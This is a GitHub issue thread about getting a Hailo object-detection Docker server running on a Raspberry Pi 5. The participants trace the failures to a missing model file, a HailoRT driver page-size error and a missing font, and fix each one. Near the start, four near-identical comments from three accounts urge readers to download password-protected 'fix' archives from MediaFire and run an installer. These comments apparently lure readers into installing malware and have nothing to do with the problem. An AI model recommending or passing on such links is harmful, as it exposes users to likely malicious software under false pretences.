### ISSUE TITLE
Docker port no map (8080)

### ISSUE THREAD

**Issue by C3PO-75** [serg987/hailo-mini-od-server#1]
Hi,

I tested  your code on a Raspberry Pi5 (with little modification python 3.11.2 and the good file for Raspberry PI5 in the Dockerfile). All compiled perfectly, but I don't view the IP address with the "docker inspect" command. 

It's good for the frigate: 

docker inspect -f '{{range.NetworkSettings.Networks}}{{.IPAddress}}{{end}}' XXXXXXXX 
172.18.0.2

But nor for the hailo-mini

docker inspect -f '{{range.NetworkSettings.Networks}}{{.IPAddress}}{{end}}' YYYYYYYYYY 

With the command "docker ps"

docker ps
CONTAINER ID   IMAGE                                    COMMAND            CREATED          STATUS                         PORTS                                                                                                                                                 NAMES
YYYYYYYYYYY   hailo-od-mini                            "python main.py"   12 minutes ago   Restarting (1) 3 seconds ago                                                                                                                                                         hailo-mini-od-server-hailo-object-detection-mini-1
XXXXXXXXXXX   ghcr.io/blakeblackshear/frigate:stable   "/init"            2 weeks ago      Up 2 minutes (healthy)         0.0.0.0:5000->5000/tcp, :::5000->5000/tcp, 0.0.0.0:8554-8555->8554-8555/tcp, :::8554-8555->8554-8555/tcp, 0.0.0.0:8555->8555/udp, :::8555->8555/udp   frigate

hailortcli scan
hailortcli fw-control identify
Hailo Devices:
[-] Device: 0000:04:00.0
Executing on device: 0000:04:00.0
Identifying board
Control Protocol Version: 2
Firmware Version: 4.18.0 (release,app,extended context switch buffer)
Logger Version: 0
Board Name: Hailo-8
Device Architecture: HAILO8L
Serial Number: HLDDLEB235100870
Part Number: HM21LB1C2KAE
Product Name: HAILO-8L AI ACC M.2 A+E KEY MODULE EXT TMP

(sorry for my bad English level).
Best regards,

**Comment by Saschl** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by deverchettychandrashekar** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by deverchettychandrashekar** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by C3PO-75** [comment]
It's good. I've moved the port zone to the end of the file. I will test now on the RP5.  He started for 3 sec and down after:

/hailo-mini-od-server $ docker ps
CONTAINER ID   IMAGE           COMMAND            CREATED          STATUS                  PORTS                                       NAMES
YYYYYYYYYYYY   hailo-od-mini   "python main.py"   11 seconds ago   Up Less than a second   0.0.0.0:8080->8080/tcp, :::8080->8080/tcp   hailo-mini-od-server-hailo-object-detection-mini-1
hailo-mini-od-server $ docker ps
CONTAINER ID   IMAGE           COMMAND            CREATED          STATUS                         PORTS     NAMES
YYYYYYYYYYYY   hailo-od-mini   "python main.py"   14 seconds ago   Restarting (1) 2 seconds ago             hailo-mini-od-server-hailo-object-detection-mini-1

In the docker log:

2024-08-26 20:35:36.430 [hailo_infer.py:80] INFO:Starting Hailo device init with model yolov7e6
2024-08-26 20:35:36.431 [config.py:25] WARNING:<config.LoggerWriter object at 0x7fff52a173d0>
2024-08-26 20:35:36.431 [config.py:18] WARNING:
2024-08-26 20:35:36.431 [config.py:18] WARNING:Traceback (most recent call last):

2024-08-26 20:35:36.431 [config.py:18] WARNING:
2024-08-26 20:35:36.431 [config.py:18] WARNING:  File "/app/main.py", line 1, in <module>

2024-08-26 20:35:36.431 [config.py:18] WARNING:
2024-08-26 20:35:36.431 [config.py:18] WARNING:    
2024-08-26 20:35:36.431 [config.py:18] WARNING:from web_server import run_server
2024-08-26 20:35:36.431 [config.py:18] WARNING:
2024-08-26 20:35:36.431 [config.py:18] WARNING:  File "/app/web_server.py", line 10, in <module>

2024-08-26 20:35:36.431 [config.py:18] WARNING:
2024-08-26 20:35:36.431 [config.py:18] WARNING:    
2024-08-26 20:35:36.431 [config.py:18] WARNING:from hailo_infer import do_inference
2024-08-26 20:35:36.431 [config.py:18] WARNING:
2024-08-26 20:35:36.431 [config.py:18] WARNING:  File "/app/hailo_infer.py", line 100, in <module>

2024-08-26 20:35:36.431 [config.py:18] WARNING:
2024-08-26 20:35:36.431 [config.py:18] WARNING:    
2024-08-26 20:35:36.431 [config.py:18] WARNING:hailo_device.start_device()
2024-08-26 20:35:36.431 [config.py:18] WARNING:
2024-08-26 20:35:36.431 [config.py:18] WARNING:  File "/app/hailo_infer.py", line 82, in start_device

2024-08-26 20:35:36.432 [config.py:18] WARNING:
2024-08-26 20:35:36.432 [config.py:18] WARNING:    
2024-08-26 20:35:36.432 [config.py:18] WARNING:self.hailo_inference = HailoInference(config.get_model_filename())
2024-08-26 20:35:36.432 [config.py:18] WARNING:
2024-08-26 20:35:36.432 [config.py:18] WARNING: 
2024-08-26 20:35:36.432 [config.py:18] WARNING: 
...
2024-08-26 20:35:36.433 [config.py:18] WARNING:
2024-08-26 20:35:36.433 [config.py:18] WARNING:  File "/app/config.py", line 68, in get_model_filename

2024-08-26 20:35:36.433 [config.py:18] WARNING:
2024-08-26 20:35:36.433 [config.py:18] WARNING:    
2024-08-26 20:35:36.433 [config.py:18] WARNING:return self.model_filename_dict[self.current_model_name]
2024-08-26 20:35:36.433 [config.py:18] WARNING:
2024-08-26 20:35:36.433 [config.py:18] WARNING: 
...
...
2024-08-26 20:35:36.434 [config.py:18] WARNING:
2024-08-26 20:35:36.434 [config.py:18] WARNING:KeyError
2024-08-26 20:35:36.434 [config.py:18] WARNING:: 
2024-08-26 20:35:36.434 [config.py:18] WARNING:'yolov7e6'
2024-08-26 20:35:36.434 [config.py:25] WARNING:<config.LoggerWriter object at 0x7fff52a173d0>
2024-08-26 20:35:36.434 [config.py:25] WARNING:<config.LoggerWriter object at 0x7fff52a173d0>
2024-08-26 20:35:36.434 [config.py:25] WARNING:<config.LoggerWriter object at 0x7fff52a173d0>

**Comment by serg987** [comment]
Hi,
Thanks for trying it! Seems everything is fine so far, the small problem here is 
```
2024-08-26 20:35:36.433 [config.py:18] WARNING:return self.model_filename_dict[self.current_model_name]
2024-08-26 20:35:36.434 [config.py:18] WARNING:KeyError
2024-08-26 20:35:36.434 [config.py:18] WARNING:'yolov7e6'
```
Have you copied yolov7e6.hef from Hailo's AWS s3 bucket to `models` folder? For Hailo-8L there's a table in Hailo's [repo](https://github.com/hailo-ai/hailo_model_zoo/blob/master/docs/public_models/HAILO8L/HAILO8L_object_detection.rst) - use the 'Compiled' column (the rightest one)
If you are going to use another default model, change it [here](https://github.com/serg987/hailo-mini-od-server/blob/89b7f16c3d2fdc46f22a4632b3feffbc0a2af271/config.py#L44) (without .hef extension), but you have to download it and put into `models` anyway. I haven't made any adjustable config, so it is hardcoded as of now, but in one place only.
You can download as many models as you want (though not all of them support post-processing, there's a note in [readme](https://github.com/hailo-ai/hailo_model_zoo/blob/master/docs/public_models/HAILO8L/HAILO8L_object_detection.rst) and try them to find most suitable for you, but the thing is that the default model should be in `models` all the time - otherwise there's nothing to start with.

If the server starts on RPi5, could you please post some stats for the processing and inference times? Would be interesting to see it.

**Comment by C3PO-75** [comment]
Hi,
Thanks for your prompt response.

I'm new to AI, so I hadn't downloaded a model. Once I did, I got this new error: 
python main.py 
2024-08-27 11:39:45.034 [hailo_infer.py:80] INFO:Starting Hailo device init with model yolov7e6
[HailoRT] [error] CHECK failed - max_desc_page_size given 16384 is bigger than hw max desc page size 4096
[HailoRT] [error] CHECK_SUCCESS failed with status=HAILO_INTERNAL_FAILURE(8)
[HailoRT] [error] CHECK_SUCCESS failed with status=HAILO_INTERNAL_FAILURE(8)
[HailoRT] [error] CHECK_SUCCESS failed with status=HAILO_INTERNAL_FAILURE(8)
[HailoRT] [error] CHECK_SUCCESS failed with status=HAILO_INTERNAL_FAILURE(8)
[HailoRT] [error] CHECK_SUCCESS failed with status=HAILO_INTERNAL_FAILURE(8)
[HailoRT] [error] CHECK_SUCCESS failed with status=HAILO_INTERNAL_FAILURE(8)
[HailoRT] [error] CHECK_SUCCESS failed with status=HAILO_INTERNAL_FAILURE(8)
[HailoRT] [error] CHECK_SUCCESS failed with status=HAILO_INTERNAL_FAILURE(8)
[HailoRT] [error] CHECK_SUCCESS failed with status=HAILO_INTERNAL_FAILURE(8)
[HailoRT] [error] CHECK_SUCCESS failed with status=HAILO_INTERNAL_FAILURE(8)
[HailoRT] [error] CHECK_SUCCESS failed with status=HAILO_INTERNAL_FAILURE(8)
2024-08-27 11:39:45.875 [config.py:25] WARNING:<config.LoggerWriter object at 0x7fff05b56310>
2024-08-27 11:39:45.875 [config.py:18] WARNING:
2024-08-27 11:39:45.875 [config.py:18] WARNING:Traceback (most recent call last):
2024-08-27 11:39:45.875 [config.py:18] WARNING:
2024-08-27 11:39:45.875 [config.py:18] WARNING:  File "/home/XXX/hailo-mini-od-server/venv/lib/python3.11/site-packages/hailo_platform/pyhailort/pyhailort.py", line 3503, in configure
...
2024-08-27 11:39:45.876 [config.py:18] WARNING:
2024-08-27 11:39:45.876 [config.py:18] WARNING:    
2024-08-27 11:39:45.876 [config.py:18] WARNING:configured_ngs_handles = self._vdevice.configure(hef._hef, configure_params_by_name)
...
2024-08-27 11:39:45.878 [config.py:18] WARNING:hailo_platform.pyhailort._pyhailort
2024-08-27 11:39:45.878 [config.py:18] WARNING:.
2024-08-27 11:39:45.878 [config.py:18] WARNING:HailoRTStatusException
2024-08-27 11:39:45.878 [config.py:18] WARNING:: 
2024-08-27 11:39:45.878 [config.py:18] WARNING:8
2024-08-27 11:39:45.878 [config.py:18] WARNING:
2024-08-27 11:39:45.878 [config.py:18] WARNING:
2024-08-27 11:39:45.878 [config.py:18] WARNING:The above exception was the direct cause of the following exception:

2024-08-27 11:39:45.878 [config.py:18] WARNING:
2024-08-27 11:39:45.878 [config.py:18] WARNING:
2024-08-27 11:39:45.879 [config.py:18] WARNING:Traceback (most recent call last):

2024-08-27 11:39:45.883 [config.py:18] WARNING:
2024-08-27 11:39:45.884 [config.py:18] WARNING:  File "/home/XXX/hailo-mini-od-server/main.py", line 1, in <module>

2024-08-27 11:39:45.885 [config.py:18] WARNING:from web_server import run_server
2024-08-27 11:39:45.885 [config.py:18] WARNING:
2024-08-27 11:39:45.886 [config.py:18] WARNING:  File "/home/XXX/hailo-mini-od-server/web_server.py", line 10, in <module>
2024-08-27 11:39:45.886 [config.py:18] WARNING:from hailo_infer import do_inference
2024-08-27 11:39:45.886 [config.py:18] WARNING:
2024-08-27 11:39:45.886 [config.py:18] WARNING:  File "/home/XXX/hailo-mini-od-server/hailo_infer.py", line 100, in <module>

2024-08-27 11:39:45.887 [config.py:18] WARNING:
2024-08-27 11:39:45.887 [config.py:18] WARNING:    
2024-08-27 11:39:45.887 [config.py:18] WARNING:hailo_device.start_device()
2024-08-27 11:39:45.887 [config.py:18] WARNING:
2024-08-27 11:39:45.888 [config.py:18] WARNING:  File "/home/XXX/hailo-mini-od-server/hailo_infer.py", line 82, in start_device
2024-08-27 11:39:45.888 [config.py:18] WARNING:
2024-08-27 11:39:45.888 [config.py:18] WARNING:    
2024-08-27 11:39:45.888 [config.py:18] WARNING:self.hailo_inference = HailoInference(config.get_model_filename())
2024-08-27 11:39:45.888 [config.py:18] WARNING:
...
2024-08-27 11:39:45.890 [config.py:18] WARNING:
2024-08-27 11:39:45.890 [config.py:18] WARNING:  File "/home/XXX/hailo-mini-od-server/utils.py", line 20, in __init__
...
2024-08-27 11:39:45.890 [config.py:18] WARNING:    
2024-08-27 11:39:45.890 [config.py:18] WARNING:self.network_group = self._configure_and_get_network_group()
2024-08-27 11:39:45.890 [config.py:18] WARNING:
...
2024-08-27 11:39:45.894 [config.py:18] WARNING:
2024-08-27 11:39:45.894 [config.py:18] WARNING:  File "/home/XXX/hailo-mini-od-server/utils.py", line 33, in _configure_and_get_network_group

2024-08-27 11:39:45.895 [config.py:18] WARNING:
2024-08-27 11:39:45.895 [config.py:18] WARNING:    
2024-08-27 11:39:45.895 [config.py:18] WARNING:network_group = self.target.configure(self.hef, configure_params)[0]

2024-08-27 11:39:45.898 [config.py:18] WARNING:  File "/home/XXX/hailo-mini-od-server/venv/lib/python3.11/site-packages/hailo_platform/pyhailort/pyhailort.py", line 3502, in configure

2024-08-27 11:39:45.899 [config.py:18] WARNING:
2024-08-27 11:39:45.900 [config.py:18] WARNING:    
2024-08-27 11:39:45.900 [config.py:18] WARNING:with ExceptionWrapper():
2024-08-27 11:39:45.900 [config.py:18] WARNING:
2024-08-27 11:39:45.900 [config.py:18] WARNING:  File "/home/XXX/hailo-mini-od-server/venv/lib/python3.11/site-packages/hailo_platform/pyhailort/pyhailort.py", line 110, in __exit__

2024-08-27 11:39:45.901 [config.py:18] WARNING:
2024-08-27 11:39:45.901 [config.py:18] WARNING:    
2024-08-27 11:39:45.901 [config.py:18] WARNING:self._raise_indicative_status_exception(value)
2024-08-27 11:39:45.901 [config.py:18] WARNING:
2024-08-27 11:39:45.901 [config.py:18] WARNING:  File "/home/XXX/hailo-mini-od-server/venv/lib/python3.11/site-packages/hailo_platform/pyhailort/pyhailort.py", line 155, in _raise_indicative_status_exception

2024-08-27 11:39:45.902 [config.py:18] WARNING:
2024-08-27 11:39:45.902 [config.py:18] WARNING:    
2024-08-27 11:39:45.902 [config.py:18] WARNING:raise self.create_exception_from_status(error_code) from libhailort_exception
2024-08-27 11:39:45.902 [config.py:18] WARNING:
2024-08-27 11:39:45.902 [config.py:18] WARNING:hailo_platform.pyhailort.pyhailort
2024-08-27 11:39:45.902 [config.py:18] WARNING:.
2024-08-27 11:39:45.902 [config.py:18] WARNING:HailoRTException
2024-08-27 11:39:45.902 [config.py:18] WARNING:: 
2024-08-27 11:39:45.902 [config.py:18] WARNING:libhailort failed with error: 8 (HAILO_INTERNAL_FAILURE)
2024-08-27 11:39:45.902 [config.py:25] WARNING:<config.LoggerWriter object at 0x7fff05b56310>
2024-08-27 11:39:45.902 [config.py:25] WARNING:<config.LoggerWriter object at 0x7fff05b56310>
2024-08-27 11:39:45.903 [config.py:25] WARNING:<config.LoggerWriter object at 0x7fff05b56310>

**Comment by C3PO-75** [comment]
It's seems a HailoRT 4.18 prob. I will solve them, and come back to you:

https://community.hailo.ai/t/unable-to-install-hailort-and-hailofw-v4-18-0/1941/13

**Comment by C3PO-75** [comment]
$ rm /lib/modules/6.6.31+rpt-rpi-2712/kernel/drivers/media/pci/hailo/hailo_pci.ko.xz 
$ dpkg -i hailort-pcie-driver_4.18.0_all.deb 
$ dpkg -i hailort_4.18.0_arm64.deb 
$ reboot 
$ modprobe -r hailo_pci 
$ modprobe hailo_pci force_desc_page_size=4096

Tadammmmm: 

docker logs  hailo-mini-od-server-hailo-object-detection-mini-1
2024-08-27 10:09:04.122 [hailo_infer.py:80] INFO:Starting Hailo device init with model yolov7e6
2024-08-27 10:09:05.363 [utils.py:62] INFO:Input layer: yolov7e6/input_layer1 (1280, 1280, 3) FormatType.UINT8
2024-08-27 10:09:05.363 [utils.py:64] INFO:Output layer: yolov7e6/yolov5_nms_postprocess (80, 5, 80) FormatType.FLOAT32
2024-08-27 10:09:05.363 [hailo_infer.py:85] INFO:Finished Hailo device init
2024-08-27 10:09:05.364 [web_server.py:228] INFO:Starting Web Server

"If the server starts on RPi5, could you please post some stats for the processing and inference times? Would be interesting to see it." How can I get this information for you ?

**Comment by serg987** [comment]
```
$ rm /lib/modules/6.6.31+rpt-rpi-2712/kernel/drivers/media/pci/hailo/hailo_pci.ko.xz
$ dpkg -i hailort-pcie-driver_4.18.0_all.deb
$ dpkg -i hailort_4.18.0_arm64.deb
$ reboot
$ modprobe -r hailo_pci
$ modprobe hailo_pci force_desc_page_size=4096
```
So, you applied this ^^^ to the host device, not the container, right? I can add this to the readme to troubleshoot

> Tadammmmm:

Seems it works. Could you please confirm you can connect with a browser to port 8080, see the web UI, and upload any pictures to process?

> How can I get this information for you ?

If it's not a big deal, I'd appreciate it. If it is - then nevermind, confirming the web UI works and objects are recognized is enough.

For checking times - connect to port 8080 with a browser, click on 'Get list-custom' button (there should be the list of available models populated under the button after the click),  then in 'Submit a file for analysis with visualization ....' select a file to process with 'Browse...' button, select a model with drop-down, and click on 'Send Visualization request'. You should see a picture with boxes around known objects. and the json response under it.

I don't need the pictures of course, just a picture resolution, model used and `inferenceMs`, `analysisRoundTripMs`, and `processMs` from that json.

**Comment by C3PO-75** [comment]
Hi,
"So, you applied this ^^^ to the host device, not the container, right? I can add this to the readme to troubleshoot"
I think it's better to link to the official Hailo community solution (I didn't invent anything) :-) In the meantime, version 4.18 should be downloaded when HailoRT is installed by default on an RBPi5. 
https://community.hailo.ai/t/upgrade-hailort-to-4-18-on-rpi/2678

I used the same image for analysis as you did in your example “CNN Travel”. 
Detection works for analysis, but not for visualization. 

![Capture d’écran 2024-08-28 à 16 31 10](https://github.com/user-attachments/assets/cc7d752c-f324-4e85-93d7-bff3ffcb5189)
![Capture d’écran 2024-08-28 à 16 32 02](https://github.com/user-attachments/assets/16053a72-21eb-43a5-84c3-5c9df7bd4898)
![Capture d’écran 2024-08-28 à 16 31 38](https://github.com/user-attachments/assets/25c1586b-fbfe-4036-836c-a591c376b9a5)

**Comment by serg987** [comment]
> Detection works for analysis

Yep, thanks a lot for the results! inference and process times look reasonable, a small concern is for analysisroundtrip. It doubles the process time, but it may be a reason if it was the first image processed. Just curious, if you send the same image (click on the 'send' button) a few times, will it decrease?

> but not for visualization.

_Most_ likely it's because the code cannot find the font to place labels on the image. But to make sure, you can check the docker logs just after the request is made. If it is fonts indeed, then it's needed to bind the fonts folder to docker. The code needs a specific font - `LiberationSans-Regular.ttf`. Not sure why it was chosen, it was in Hailo's example. Desktop Ubuntu has it in `/usr/share/fonts/truetype/liberation2/LiberationSans-Regular.ttf`. Not sure where it is on RP (even whether it is there). Try to find it 

```
find / -name "LiberationSans-Regular.ttf" 2>/dev/nul
```

and then bind the whole fonts directory in [docker-compose.yml](https://github.com/serg987/hailo-mini-od-server/blob/89b7f16c3d2fdc46f22a4632b3feffbc0a2af271/docker-compose.yaml#L13), probably leaving the right (container) part as it is.

If RP doesn't have it, maybe I can include it in the repo for simplicity

And thanks again for helping with testing!

**Comment by C3PO-75** [comment]
Hi,
RP doesn't have the font. After "sudo apt install  fonts-liberation" it's  better 

All the screenshots. the inference and process times doesn't change much. 

![Capture d’écran 2024-08-29 à 11 00 46](https://github.com/user-attachments/assets/3fd82265-d8ff-4840-9d0d-343e6ccbed1a)
![Capture d’écran 2024-08-29 à 11 00 18](https://github.com/user-attachments/assets/a8066f37-7f79-4293-ab7a-e5444c03f580)
![Capture d’écran 2024-08-29 à 11 00 01](https://github.com/user-attachments/assets/1ce982c7-0ae3-404a-b2e6-4c3ce2a8948e)
![Capture d’écran 2024-08-29 à 10 59 46](https://github.com/user-attachments/assets/d05a636d-8b4a-4ba0-afe6-f01890fcf9df)
![Capture d’écran 2024-08-29 à 10 59 33](https://github.com/user-attachments/assets/7441da00-b8d7-4583-9420-118103d45ec2)
![Capture d’écran 2024-08-29 à 10 59 21](https://github.com/user-attachments/assets/5c31fe0d-f031-484e-bb51-922e32a90073)

**Comment by C3PO-75** [comment]
Thanks a lot for your work, it's a great alternative for frigate until it natively supports HAILO. 

To sum up, for RPI5 you need : 

- Manually install HAILO 4.18 and follow the official procedure to change it if the official Debian repo version (HAILO 4.17) is installed.
- Install the Liberation font, as it is not installed by default. 

If you agree, I'll close the issue. 

Best regards,

**Comment by serg987** [comment]
Sure, please go ahead and close it. Thanks a lot for the troubleshooting, testing, and providing all the info! I'll make changes in readme to include that

**Comment by shorawitz** [comment]
Hello.  I seem to be running into a similar issue with the model for the Hailo8.  In your docs, you reference downloading the models from the `hailo_model_zoo` repo referenced in the public models folder for `HAILO8`: "HAILO8_object_detection/COCO" table .  The downloaded file is a zip file containing:
```
unzip -l Downloads/yolov7-e6.zip 
Archive:  Downloads/yolov7-e6.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
388895302  2023-04-25 01:44   yolov7-e6.onnx
     1394  2023-04-25 01:44   yolov7e6_nms_config.json
---------                     -------
388896696                     2 files
```
I don't see a 'hef' file in the archive.  You mentioned something about getting the Hailo8 models from an AWS S3 bucket, but I'm not sure where to locate any other model files.  Can you direct me to the correct location or do I need to convert the onnx file?

Best regards

**Comment by serg987** [comment]
@shorawitz I guess you used the right [link](https://github.com/hailo-ai/hailo_model_zoo/blob/master/docs/public_models/HAILO8/HAILO8_object_detection.rst), and you downloaded the zip file from the `Pretrained` column. The table on that page is not fully shown, so the needed `Compiled` column is not visible. You have to scroll to the very bottom of the page, where you can find a horizontal scroll bar. Slide it to the right and you'll find it. The files are already in `.hef` format over there.

![Image](https://github.com/user-attachments/assets/5d5959c5-6fcb-48ad-852a-b1183314366d)

**Comment by shorawitz** [comment]
Mia Culpa!

Thank you!  I got it working with the example models in the deb pkg.  It didn't seem to work as well as CodeProject using YOLOv5 6.2 running on my: 11th Gen Intel(R) Core(TM) i5-1155G7 @ 2.50GHz (Intel) - no GPU.

That model wasn't included in the deb pkg.  I'll give it another go trying a few of those models in github.

Thank you again!
